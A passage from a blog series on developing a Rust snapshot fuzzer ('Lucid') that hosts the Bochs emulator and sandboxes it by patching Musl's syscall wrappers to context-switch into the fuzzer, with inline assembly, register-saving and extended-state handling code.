open calls are basically just handled as sanity checks at this point to make sure we know what Bochs is trying to access:

// open
        0x2 => {
            // Get pointer to path string we're trying to open
            let path_p = a1 as *const libc::c_char;

            // Make sure it's not NULL
            if path_p.is_null() {
                fault!(contextp, Fault::NullPath);
            }            

            // Create c_str from pointer
            let c_str = unsafe { std::ffi::CStr::from_ptr(path_p) };

            // Create Rust str from c_str
            let Ok(path_str) = c_str.to_str() else {
                fault!(contextp, Fault::InvalidPathStr);
            };

            // Validate open flags (32768 == O_RDONLY | O_LARGEFILE)
            if a2 as i32 != 32768 {
                println!("Unhandled file permissions: {}", a2);
                fault!(contextp, Fault::Syscall);
            }

            // Open the file
            let fd = context.files.open(path_str);
            if fd.is_err() {
                println!("Non-existent file path: {}", path_str);
                fault!(contextp, Fault::NoFile);
            }

            // Success
            fd.unwrap() as u64
        },

// Attempt to open a file
    pub fn open(&mut self, path: &str) -> Result<i32, ()> {
        // Try to find the requested path
        for file in self.files.iter() {
            if file.path == path {
                return Ok(file.fd);
            }
        }

        // We didn't find the file
        Err(())
    }

And that’s really the whole of file I/O right now. Down the line, we’ll need to keep these in mind when we’re doing snapshots and resetting snapshots because the file state will need to be restored differentially, but this is a problem for another day.
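To make the cursor handling concrete, here is a minimal, self-contained sketch of an in-memory file table with the same open/read behavior. The names `MemFile` and `FileTable` and the safe slice copy are my own assumptions for illustration; the real handlers above work on raw pointers handed over by Bochs.

```rust
// Hypothetical stand-ins for the fuzzer's file bookkeeping, illustration only
struct MemFile {
    fd: i32,
    path: String,
    contents: Vec<u8>,
    cursor: usize,
}

struct FileTable {
    files: Vec<MemFile>,
}

impl FileTable {
    // Look up a pre-registered path, mirroring the `open` logic above
    fn open(&self, path: &str) -> Result<i32, ()> {
        self.files
            .iter()
            .find(|f| f.path == path)
            .map(|f| f.fd)
            .ok_or(())
    }

    // Copy at most `buf.len()` bytes starting at the cursor, then advance it
    fn read(&mut self, fd: i32, buf: &mut [u8]) -> Result<usize, ()> {
        let file = self.files.iter_mut().find(|f| f.fd == fd).ok_or(())?;

        // Clamp the read size to what is left in the file
        let length = std::cmp::min(buf.len(), file.contents.len() - file.cursor);
        buf[..length]
            .copy_from_slice(&file.contents[file.cursor..file.cursor + length]);

        // Adjust the file cursor
        file.cursor += length;
        Ok(length)
    }
}
```

Because the only mutable per-file state here is `cursor`, resetting a snapshot in a model like this would amount to restoring the cursors.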

Conclusion

The work continues on the fuzzer, and I’m still having a blast implementing it. Special thanks to everyone mentioned in the repository for their help! Next, we’ll have to pick a fuzzing target and get it running in Bochs. We’ll have to lobotomize the system Bochs is emulating so that it runs our target program in a way that lets us snapshot and fuzz appropriately. That should be really fun. Until then!

Fuzzer Development 2: Sandboxing Syscalls

2024-02-17T00:00:00+00:00

Introduction

If you haven’t heard, we’re developing a fuzzer on the blog these days. I don’t even know if “fuzzer” is the right word for what we’re building, it’s almost more like an execution engine that will expose hooks? Anyways, if you missed the first episode you can catch up here. We are creating a fuzzer that loads a statically built Bochs emulator into itself, and executes Bochs logic while maintaining a sandbox for Bochs. You can think of it as, we were too lazy to implement our own x86_64 emulator from scratch so we’ve just literally taken a complete emulator and stuffed it into our own process to use it. The fuzzer is written in Rust and Bochs is a C++ codebase. Bochs is a full system emulator, so the devices and everything else is just simulated in software. This is great for us because we can simply snapshot and restore Bochs itself to achieve snapshot fuzzing of our target. So the fuzzer runs Bochs and Bochs runs our target. This allows us to snapshot fuzz arbitrarily complex targets: web browsers, kernels, network stacks, etc. This episode, we’ll delve into the concept of sandboxing Bochs from syscalls. We do not want Bochs to be capable of escaping its sandbox or retrieving any data from outside of our environment. So today we’ll get into the implementation details of my first stab at Bochs-to-fuzzer context switching to handle syscalls. In the future we will also need to implement context switching from fuzzer-to-Bochs as well, but for now let’s focus on syscalls.

This fuzzer was conceived of and implemented originally by Brandon Falk.

There will be no repo changes with this post.

Syscalls

Syscalls are a way for userland to voluntarily context switch to kernel-mode in order to utilize some kernel-provided utility or function. Context switching simply means changing the context in which code is executing. When you’re adding integers or reading/writing memory, your process is executing in user-mode within your process’s virtual address space. But if you want to open a socket or file, you need the kernel’s help. To do this, you make a syscall, which tells the processor to switch execution modes from user-mode to kernel-mode. In order to leave user-mode, go to kernel-mode, and then return to user-mode, a lot of care must be taken to accurately save the execution state at every step. Once you try to execute a syscall, the first thing the OS has to do is save your current execution state before it starts executing your requested kernel code. That way, once the kernel is done with your request, it can return gracefully to executing your user-mode process.

Context-switching can be thought of as switching from executing one process to another. In our case, we’re switching from Bochs execution to Lucid execution. Bochs is doing its thing, reading/writing memory, doing arithmetic etc, but when it needs the kernel’s help it attempts to make a syscall. When this occurs we need to:

recognize that Bochs is trying to syscall (weirdly, this isn’t always easy to do)
intercept execution and redirect to the appropriate code path
save Bochs’ execution state
execute our Lucid logic in place of the kernel, think of Lucid as Bochs’ kernel
return gracefully to Bochs by restoring its state

C Library

Normally programmers don’t have to worry about making syscalls directly. They instead use functions that are defined and implemented in a C library, and it’s these functions that actually make the syscalls. You can think of these functions as wrappers around a syscall. For instance, if you use the C library function for open, you’re not directly making a syscall; you’re calling into the library’s open function, and that function is the one emitting a syscall instruction that actually performs the context switch into the kernel. Doing things this way takes a lot of the portability work off of the programmer’s shoulders because the guts of the library functions perform all of the conditional checks for environmental variables and execute accordingly. Programmers just call the open function and don’t have to worry about things like syscall numbers, error handling, etc as those things are kept abstracted and uniform in the code exported to the programmer.

This provides a nice chokepoint for our purposes, since Bochs programmers also use C library functions instead of invoking syscalls directly. When Bochs wants to make a syscall, it’s going to call a C library function. This gives us an opportunity to intercept these syscalls before they are made. We can insert our own logic into these functions that checks whether or not Bochs is executing under Lucid and, if it is, directs execution to Lucid instead of the kernel. In pseudocode we can achieve something like the following:

fn syscall()
  if lucid:
    lucid_syscall()
  else:
    normal_syscall()

Musl

Musl is a C library that is meant to be “lightweight.” This gives us some simplicity to work with vs. something like Glibc, which is a monstrosity and an affront to God. Importantly, Musl has a great reputation for static linking, which is what we need when we build our static PIE Bochs. So the idea here is that we can manually alter Musl code to change how syscall-invoking wrapper functions work so that we can hijack execution in a way that context-switches into Lucid rather than the kernel.

In this post we’ll be working with Musl 1.2.4 which is the latest version as of today.

Baby Steps

Instead of jumping straight into Bochs, we’ll be using a test program for the purposes of developing our first context-switching routines. This is just easier. The test program is this:

#include <stdio.h>
#include <unistd.h>
#include <lucid.h>

int main(int argc, char *argv[]) {
    printf("Argument count: %d\n", argc);
    printf("Args:\n");
    for (int i = 0; i < argc; i++) {
        printf("   -%s\n", argv[i]);
    }

    size_t iters = 0;
    while (1) {
        printf("Test alive!\n");
        sleep(1);
        iters++;

        if (iters == 5) { break; }
    }

    printf("g_lucid_ctx: %p\n", g_lucid_ctx);
}

The program will just tell us its argument count, print each argument, live for ~5 seconds, and then print the memory address of a Lucid execution context data structure. This data structure will be allocated and initialized by Lucid if the program is running under Lucid, and it will be NULL otherwise. So how do we accomplish this?

Execution Context Tracking

Our problem is that we need a globally accessible way for the program we load (eventually Bochs) to tell whether or not it’s running under Lucid or running as normal. We also have to provide many data structures and function addresses to Bochs, so we need a vehicle to do that.

What I’ve done is create my own header file called lucid.h and place it in Musl. This file defines all of the Lucid-specific data structures we need Bochs to have access to when it’s compiled against Musl. So in the header file right now we’ve defined a lucid_ctx data structure, and we’ve also created a global instance of one called g_lucid_ctx:

// An execution context definition that we use to switch contexts between the
// fuzzer and Bochs. This should contain all of the information we need to track
// all of the mutable state between snapshots that we need such as file data.
// This has to be consistent with LucidContext in context.rs
typedef struct lucid_ctx {
    // This must always be the first member of this struct
    size_t exit_handler;
    int save_inst;
    size_t save_size;
    size_t lucid_save_area;
    size_t bochs_save_area;
    struct register_bank register_bank;
    size_t magic;
} lucid_ctx_t;

// Pointer to the global execution context, if running inside Lucid, this will
// point to a lucid_ctx_t inside the fuzzer
lucid_ctx_t *g_lucid_ctx;
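Since the C definition has to stay consistent with the Rust side, here is a rough sketch of what a matching `#[repr(C)]` mirror could look like, along with a check of the "exit_handler must be first" invariant. The type names `LucidContextSketch` and `RegisterBankSketch` are hypothetical, and modeling the register bank as sixteen pointer-sized slots is an assumption based on the sixteen general purpose registers; this is not the actual definition in context.rs.

```rust
use std::os::raw::c_int;

// Hypothetical mirror of `struct register_bank`: sixteen GPR-sized slots
#[repr(C)]
#[derive(Default)]
struct RegisterBankSketch {
    regs: [usize; 16],
}

// Hypothetical mirror of `lucid_ctx_t`; `repr(C)` keeps the field order and
// padding the same as what a C compiler produces for the header
#[repr(C)]
#[derive(Default)]
struct LucidContextSketch {
    exit_handler: usize, // must always be the first member
    save_inst: c_int,
    save_size: usize,
    lucid_save_area: usize,
    bochs_save_area: usize,
    register_bank: RegisterBankSketch,
    magic: usize,
}

// True when a pointer to the context is also a pointer to `exit_handler`
fn exit_handler_is_first(ctx: &LucidContextSketch) -> bool {
    let base = ctx as *const LucidContextSketch as usize;
    let field = &ctx.exit_handler as *const usize as usize;
    base == field
}
```

Without `repr(C)`, Rust is free to reorder fields, so the two sides could silently disagree about where each member lives.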

Program Start Under Lucid

So in Lucid’s main function right now we do the following:

Load Bochs
Create an execution context
Jump to Bochs’ entry point and start executing

When we jump to Bochs’ entry point, one of the earliest functions called is a function in Musl called _dlstart_c located in the source file dlstart.c. Right now, we create that global execution context in Lucid on the heap, and then we pass its address in r15, an arbitrarily chosen register. This whole function will have to change eventually because we’ll want to context switch from Lucid to Bochs to perform this in the future, but for now this is all we do:

pub fn start_bochs(bochs: Bochs, context: Box<LucidContext>) {
    // rdx: we have to clear this register as the ABI specifies that exit
    // hooks are set when rdx is non-null at program start
    //
    // rax: arbitrarily used as a jump target to the program entry
    //
    // rsp: Rust does not allow you to use 'rsp' explicitly with in(), so we
    // have to manually set it with a `mov`
    //
    // r15: holds a pointer to the execution context, if this value is non-
    // null, then Bochs learns at start time that it is running under Lucid
    //
    // We don't really care about execution order as long as we specify clobbers
    // with out/lateout, that way the compiler doesn't allocate a register we 
    // then immediately clobber
    unsafe {
        asm!(
            "xor rdx, rdx",
            "mov rsp, {0}",
            "mov r15, {1}",
            "jmp rax",
            in(reg) bochs.rsp,
            in(reg) Box::into_raw(context),
            in("rax") bochs.entry,
            lateout("rax") _,   // Clobber (inout so no conflict with in)
            out("rdx") _,       // Clobber
            out("r15") _,       // Clobber
        );
    }
}

So when we jump to Bochs’ entry point having come from Lucid, r15 should hold the address of the execution context. In _dlstart_c, we can check r15 and act accordingly. Here are the additions I made to Musl’s start routine:

hidden void _dlstart_c(size_t *sp, size_t *dynv)
{
	// The start routine is handled in inline assembly in arch/x86_64/crt_arch.h
	// so we can just do this here. That function logic clobbers only a few
	// registers, so we can have the Lucid loader pass the address of the 
	// Lucid context in r15, this is obviously not the cleanest solution but
	// it works for our purposes
	size_t r15;
	__asm__ __volatile__(
		"mov %%r15, %0" : "=r"(r15)
	);

	// If r15 was not 0, set the global context address for the g_lucid_ctx that
	// is in the Rust fuzzer
	if (r15 != 0) {
		g_lucid_ctx = (lucid_ctx_t *)r15;

		// We have to make sure this is true, we rely on this
		if ((void *)g_lucid_ctx != (void *)&g_lucid_ctx->exit_handler) {
			__asm__ __volatile__("int3");
		}
	}

	// We didn't get a g_lucid_ctx, so we can just run normally
	else {
		g_lucid_ctx = (lucid_ctx_t *)0;
	}

When this function is called, r15 remains untouched by the earliest Musl logic. So we use inline assembly to extract the value into a variable called r15 and check it for data. If it has data, we set the global context variable to the address in r15; otherwise we explicitly set it to NULL and run as normal. Now with a global set, we can do runtime checks for our environment and optionally call into the real kernel or into Lucid.

Lobotomizing Musl Syscalls

Now with our global set, it’s time to edit the functions responsible for making syscalls. Musl is very well organized so finding the syscall invoking logic was not too difficult. For our target architecture, which is x86_64, those syscall invoking functions are in arch/x86_64/syscall_arch.h. They are organized by how many arguments the syscall takes:

static __inline long __syscall0(long n)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall1(long n, long a1)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall2(long n, long a1, long a2)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2)
						  : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall3(long n, long a1, long a2, long a3)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall4(long n, long a1, long a2, long a3, long a4)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10): "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall5(long n, long a1, long a2, long a3, long a4, long a5)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	register long r9 __asm__("r9") = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
	return ret;
}

For syscalls, there is a well-defined calling convention. Syscalls take a “syscall number” in rax, which determines which syscall you want; the next n parameters are then passed in registers in order: rdi, rsi, rdx, r10, r8, and r9.

This is pretty intuitive but the syntax is a bit mystifying, like for example on those __asm__ __volatile__ ("syscall" lines, it’s kind of hard to see what it’s doing. Let’s take the most convoluted function, __syscall6 and break down all the syntax. We can think of the assembly syntax as a format string like for printing, but this is for emitting code instead:

unsigned long ret is where we will store the result of the syscall to indicate whether or not it was a success. In the raw assembly, we can see that there is a : and then "=a"(ret). This first set of parameters after the initial colon indicates output parameters. We are saying: please store the result in rax (symbolized in the syntax as a) into the variable ret.
The next series of params after the next colon are input parameters. "a"(n) is saying: place the function argument n, which is the syscall number, into rax, which is symbolized again as a. Next, a1 is stored in rdi, which is symbolized as D, and so forth.
Arguments 4-6 are placed in registers above, for instance the syntax register long r10 __asm__("r10") = a4; is a strong compiler hint to store a4 into r10. And then later we see "r"(r10) says input the variable r10 into a general purpose register (which is already satisfied).
The last set of colon-separated values are known as “clobbers”. These tell the compiler what our syscall is expected to corrupt. So the syscall calling convention specifies that rcx, r11, and memory may be overwritten by the kernel.

With the syntax explained, we can see what is taking place. The job of these functions is to translate a function call into a syscall. The calling convention for functions, defined by the System V ABI, differs from that of a syscall in which registers it uses. So when we call __syscall6 and pass its arguments, each argument is stored in the following location:

n → rdi
a1 → rsi
a2 → rdx
a3 → rcx
a4 → r8
a5 → r9
a6 → stack

So the compiler will take those function args from the System V ABI and translate them into the syscall via the assembly that we explained above. So now these are the functions we need to edit so that we don’t emit that syscall instruction and instead call into Lucid.
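To see the two conventions side by side, here is a small sketch that models them as lookup tables. The function names are hypothetical, and it only describes where values live at a real (non-inlined) call boundary; once the compiler inlines these `static __inline` helpers it is free to keep the arguments wherever it likes until the asm constraints force them into place.

```rust
// Registers for the first six integer arguments of a normal function call
// under the System V AMD64 ABI
const FUNCTION_ARG_REGS: [&str; 6] = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"];

// Registers for the six arguments of a Linux x86_64 syscall; the syscall
// number itself travels in rax
const SYSCALL_ARG_REGS: [&str; 6] = ["rdi", "rsi", "rdx", "r10", "r8", "r9"];

// Where the k-th parameter (0-based) of `__syscall6(n, a1, ..., a6)` lives on
// function entry; it has seven parameters, so the last one is on the stack
fn function_entry_location(param_index: usize) -> &'static str {
    FUNCTION_ARG_REGS.get(param_index).copied().unwrap_or("stack")
}

// Where the same parameter must be when the `syscall` instruction executes
fn syscall_location(param_index: usize) -> &'static str {
    match param_index {
        0 => "rax", // syscall number
        i => SYSCALL_ARG_REGS.get(i - 1).copied().unwrap_or("unsupported"),
    }
}
```

For example, `a4` (parameter index 4) arrives in r8 as a function argument but has to end up in r10 for the syscall, which is exactly the shuffling the inline assembly constraints describe.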

Conditionally Calling Into Lucid

So we need a way in these function bodies to call into Lucid instead of emitting syscall instructions. To do so we need to define our own calling convention. For now I’ve been using the following:

r15: contains the address of the global Lucid execution context
r14: contains an “exit reason” which is just an enum explaining why we are context switching
r13: is the base address of the register bank structure of the Lucid execution context, we need this memory section to store our register values to save our state when we context switch
r12: stores the address of the “exit handler” which is the function to call to context switch

This will no doubt change some as we add more features/functionality. I should also note that, according to the ABI, it is the function’s responsibility to preserve these registers: the caller expects that they won’t change during a function call, and we are changing them. That’s OK because in the function where we use them we bind them to explicit register variables, so the compiler is aware that they change. Before the function executes any of its own code, the compiler pushes those registers onto the stack to save them, and before returning it pops them back into the registers so that the caller gets back the expected values. So we’re free to use them.

So to alter the functions, I changed the function logic to first check whether we have a global Lucid execution context. If we do not, we execute the normal Musl function. You can see that here, as I’ve moved the normal function logic out to a separate function called __syscall6_original:

static __inline long __syscall6_original(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8  __asm__("r8")  = a5;
	register long r9  __asm__("r9")  = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2), "d"(a3), "r"(r10),
							"r"(r8), "r"(r9) : "rcx", "r11", "memory");

	return ret;
}

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }

However, if we are running under Lucid, I set up our calling convention by explicitly setting the registers r12-r15 in accordance with what we expect to find there when we context-switch to Lucid.

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
    if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }
	
    register long ret;
    register long r12 __asm__("r12") = (size_t)(g_lucid_ctx->exit_handler);
    register long r13 __asm__("r13") = (size_t)(&g_lucid_ctx->register_bank);
    register long r14 __asm__("r14") = SYSCALL;
    register long r15 __asm__("r15") = (size_t)(g_lucid_ctx);

Now with our calling convention set up, we can then use inline assembly as before. Notice we’ve replaced the syscall instruction with call r12, calling our exit handler as if it’s a normal function:

__asm__ __volatile__ (
        "mov %1, %%rax\n\t"
	"mov %2, %%rdi\n\t"
	"mov %3, %%rsi\n\t"
	"mov %4, %%rdx\n\t"
	"mov %5, %%r10\n\t"
	"mov %6, %%r8\n\t"
	"mov %7, %%r9\n\t"
        "call *%%r12\n\t"
        "mov %%rax, %0\n\t"
        : "=r" (ret)
        : "r" (n), "r" (a1), "r" (a2), "r" (a3), "r" (a4), "r" (a5), "r" (a6),
		  "r" (r12), "r" (r13), "r" (r14), "r" (r15)
        : "rax", "rcx", "r11", "memory"
    );
	
	return ret;

So now we’re calling the exit handler instead of syscalling into the kernel, and all of the registers are set up as if we’re syscalling. We’ve also got our calling convention registers set up. Let’s see what happens when we land on the exit handler, a function that is implemented in Rust inside Lucid. We are jumping from Bochs code directly to Lucid code!

Implementing a Context Switch

The first thing we need to do is create a function body for the exit handler. In Rust, we can make the function visible to Bochs (via our edited Musl) by declaring the function as an extern C function and giving it a label in inline assembly as such:

extern "C" { fn exit_handler(); }
global_asm!(
    ".global exit_handler",
    "exit_handler:",

So this function is what will be jumped to by Bochs when it tries to syscall under Lucid. The first thing we need to consider is that we need to keep track of Bochs’ state the way the kernel would upon entry to the context switching routine. The first thing we’ll want to save off is the general purpose registers. By doing this, we can preserve the state of the registers, but also unlock them for our own use. Since we save them first, we’re then free to use them. Remember that our calling convention uses r13 to store the base address of the execution context register bank:

#[repr(C)]
#[derive(Default, Clone)]
pub struct RegisterBank {
    pub rax:    usize,
    rbx:        usize,
    rcx:        usize,
    pub rdx:    usize,
    pub rsi:    usize,
    pub rdi:    usize,
    rbp:        usize,
    rsp:        usize,
    pub r8:     usize,
    pub r9:     usize,
    pub r10:    usize,
    r11:        usize,
    r12:        usize,
    r13:        usize,
    r14:        usize,
    r15:        usize,
}

We can save the register values then by doing this:

// Save the GPRS to memory
"mov [r13 + 0x0], rax",
"mov [r13 + 0x8], rbx",
"mov [r13 + 0x10], rcx",
"mov [r13 + 0x18], rdx",
"mov [r13 + 0x20], rsi",
"mov [r13 + 0x28], rdi",
"mov [r13 + 0x30], rbp",
"mov [r13 + 0x38], rsp",
"mov [r13 + 0x40], r8",
"mov [r13 + 0x48], r9",
"mov [r13 + 0x50], r10",
"mov [r13 + 0x58], r11",
"mov [r13 + 0x60], r12",
"mov [r13 + 0x68], r13",
"mov [r13 + 0x70], r14",
"mov [r13 + 0x78], r15",

This saves the register values to the register bank in memory for preservation. Next, we’ll want to preserve the CPU’s flags. Luckily there is a single instruction for this purpose, pushfq, which pushes the flag values onto the stack.

We’re using a pure assembly stub right now, but we’d like to start using Rust at some point, and that point is now. We have saved all the state we can for now, and it’s time to call into a real Rust function that will make programming and implementation easier. To call into a function, though, we need to set up the register values to adhere to the function-calling ABI. Two pieces of data that we want to be accessible are the execution context and the reason why we exited. Those are in r15 and r14 respectively, so we can simply place them into the registers used for passing function arguments and call into a Rust function called lucid_handler.
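The offsets hard-coded in the save stub only work if they line up with the field order of RegisterBank, so it can be worth checking them mechanically. Below is a minimal sketch of such a check; `BankSketch` is a hypothetical copy of the layout that uses `u64` slots (an assumption, so the numbers hold regardless of host pointer width), and the offsets are computed from real field addresses.

```rust
// Hypothetical mirror of the RegisterBank layout, one 8-byte slot per GPR
#[repr(C)]
#[derive(Default)]
struct BankSketch {
    rax: u64,
    rbx: u64,
    rcx: u64,
    rdx: u64,
    rsi: u64,
    rdi: u64,
    rbp: u64,
    rsp: u64,
    r8: u64,
    r9: u64,
    r10: u64,
    r11: u64,
    r12: u64,
    r13: u64,
    r14: u64,
    r15: u64,
}

// Byte offset of `field` from the start of `bank`, derived from addresses
fn offset_in(bank: &BankSketch, field: &u64) -> usize {
    field as *const u64 as usize - bank as *const BankSketch as usize
}
```

With this layout, `offset_in(&bank, &bank.r13)` evaluates to 0x68, the same displacement the stub uses when it stores r13. If a field were ever reordered in the struct, a check like this would catch the mismatch before the assembly quietly saved registers into the wrong slots.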

// Save the CPU flags
"pushfq",

// Set up the function arguments for lucid_handler according to ABI
"mov rdi, r15", // Put the pointer to the context into RDI
"mov rsi, r14", // Put the exit reason into RSI

// At this point, we've been called into by Bochs, this should mean that 
// at the beginning of our exit_handler, rsp was only 8-byte aligned and
// thus, by ABI, we cannot legally call into a Rust function since to do so
// requires rsp to be 16-byte aligned. Luckily, `pushfq` just 16-byte
// aligned the stack for us and so we are free to `call`
"call lucid_handler",

So now, we are free to execute real Rust code! Here is lucid_handler as of now:

// This is where the actual logic is for handling the Bochs exit, we have to 
// use no_mangle here so that we can call it from the assembly blob. We need
// to see why we've exited and dispatch to the appropriate function
#[no_mangle]
extern "C" fn lucid_handler(context: *mut LucidContext, exit_reason: i32) {
    // We have to make sure this bad boy isn't NULL 
    if context.is_null() {
        println!("LucidContext pointer was NULL");
        fatal_exit();
    }

    // Ensure that we have our magic value intact, if this is wrong, then we 
    // are in some kind of really bad state and just need to die
    let magic = LucidContext::ptr_to_magic(context);
    if magic != CTX_MAGIC {
        println!("Invalid LucidContext Magic value: 0x{:X}", magic);
        fatal_exit();
    }

    // Before we do anything else, save the extended state
    let save_inst = LucidContext::ptr_to_save_inst(context);
    if save_inst.is_err() {
        println!("Invalid Save Instruction");
        fatal_exit();
    }
    let save_inst = save_inst.unwrap();

    // Get the save area
    let save_area =
        LucidContext::ptr_to_save_area(context, SaveDirection::FromBochs);

    if save_area == 0 || save_area % 64 != 0 {
        println!("Invalid Save Area");
        fatal_exit();
    }

    // Determine save logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xsave to save the extended state to Bochs save area
            unsafe { _xsave64(save_area as *mut u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxsave to save the extended state to Bochs save area
            unsafe { _fxsave64(save_area as *mut u8); }
        },
        _ => (), // NoSave
    }

    // Try to convert the exit reason into BochsExit
    let exit_reason = BochsExit::try_from(exit_reason);
    if exit_reason.is_err() {
        println!("Invalid Bochs Exit Reason");
        fatal_exit();
    }
    let exit_reason = exit_reason.unwrap();
    
    // Determine what to do based on the exit reason
    match exit_reason {
        BochsExit::Syscall => {
            syscall_handler(context);
        },
    }

    // Restore extended state, determine restore logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xrstor to restore the extended state from Bochs save area
            unsafe { _xrstor64(save_area as *const u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxrstor to restore the extended state from Bochs save area
            unsafe { _fxrstor64(save_area as *const u8); }
        },
        _ => (), // NoSave
    }
}

There are a few important pieces here to discuss.

Extended State

Let’s start with this concept of the save area. What is that? Well, we already have the general purpose registers and our CPU flags saved, but there is what’s called an “extended state” of the processor that we haven’t saved. This can include the floating-point registers, vector registers, and other state information used by the processor to support advanced execution features like SIMD (Single Instruction, Multiple Data) instructions, encryption, and other stuff like control registers. Is this important? It’s hard to say, we don’t know wtf Bochs will do, it might count on these to be preserved across function calls, so I thought we’d go ahead and do it.

To save this state, you just execute the appropriate saving instruction for your CPU. To do this somewhat dynamically at runtime, I query the processor for two saving instructions, xsave and fxsave, to see if they’re available. If neither is available, for now, we don’t support anything else. So when we create the execution context initially, we determine what save instruction we’ll need and store that answer in the execution context. Then on a context switch, we can dynamically use the appropriate extended state saving function. This works because we don’t use any of the extended state in lucid_handler yet, so it’s still preserved. You can see how I checked during context initialization here:

pub fn new() -> Result<Self, LucidErr> {
        // Check for what kind of features are supported we check from most 
        // advanced to least
        let save_inst = if std::is_x86_feature_detected!("xsave") {
            SaveInst::XSave64
        } else if std::is_x86_feature_detected!("fxsr") {
            SaveInst::FxSave64
        } else {
            SaveInst::NoSave
        };

        // Get save area size
        let save_size: usize = match save_inst {
            SaveInst::NoSave => 0,
            _ => calc_save_size(),
        };

The way this works is that the save instruction takes a pointer to the memory where you want the state saved and also a mask describing how much you want saved, i.e. which specific state components. I just maxed out the amount of state I want saved and asked the CPU how much memory that would be:

// Standalone function to calculate the size of the save area for saving the 
// extended processor state based on the current processor's features. `cpuid` 
// will return the save area size based on the value of the XCR0 when ECX==0
// and EAX==0xD. The value returned to EBX is based on the current features
// enabled in XCR0, while the value returned in ECX is the largest size it
// could be based on CPU capabilities. So out of an abundance of caution we use
// the ECX value. We have to preserve EBX or rustc gets angry at us. We are
// assuming that the fuzzer and Bochs do not modify the XCR0 at any time.  
fn calc_save_size() -> usize {
    let save: usize;
    unsafe {
        asm!(
            "push rbx",
            "mov rax, 0xD",
            "xor rcx, rcx",
            "cpuid",
            "pop rbx",
            out("rax") _,       // Clobber
            out("rcx") save,    // Save the max size
            out("rdx") _,       // Clobbered by CPUID output (w eax)
        );
    }

    // Round up to the nearest page size
    (save + PAGE_SIZE - 1) & !(PAGE_SIZE - 1)
}
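The rounding expression at the end of calc_save_size is the usual power-of-two round-up trick. Here is a small standalone sketch of it together with the alignment check that lucid_handler applies to the save area; the 4 KiB `PAGE_SIZE` value and the function names are assumptions for illustration.

```rust
const PAGE_SIZE: usize = 0x1000; // assumed 4 KiB pages

// Round `size` up to the next multiple of PAGE_SIZE; this only works because
// PAGE_SIZE is a power of two, so `!(PAGE_SIZE - 1)` clears the low bits
fn page_align(size: usize) -> usize {
    (size + PAGE_SIZE - 1) & !(PAGE_SIZE - 1)
}

// Same validity test the handler performs: non-null and 64-byte aligned,
// which is the alignment xsave requires for its save area
fn is_valid_save_area(addr: usize) -> bool {
    addr != 0 && addr % 64 == 0
}
```

A save size of 2696 bytes, for instance, rounds up to a single 0x1000-byte page, and any page-aligned mapping automatically satisfies the 64-byte alignment requirement.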

I page align the result, map that memory during execution context initialization, and save the memory address in the execution context. Now at run time in lucid_handler we can save the extended state:

// Determine save logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xsave to save the extended state to Bochs save area
            unsafe { _xsave64(save_area as *mut u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxsave to save the extended state to Bochs save area
            unsafe { _fxsave64(save_area as *mut u8); }
        },
        _ => (), // NoSave
    }

Right now, all we’re handling for exit reasons are syscalls, so we invoke our syscall handler and then restore the extended state before returning back to the exit_handler assembly stub:

// Determine what to do based on the exit reason
    match exit_reason {
        BochsExit::Syscall => {
            syscall_handler(context);
        },
    }

    // Restore extended state, determine restore logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xrstor to restore the extended state from Bochs save area
            unsafe { _xrstor64(save_area as *const u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxrstor to restore the extended state from Bochs save area
            unsafe { _fxrstor64(save_area as *const u8); }
        },
        _ => (), // NoSave
    }
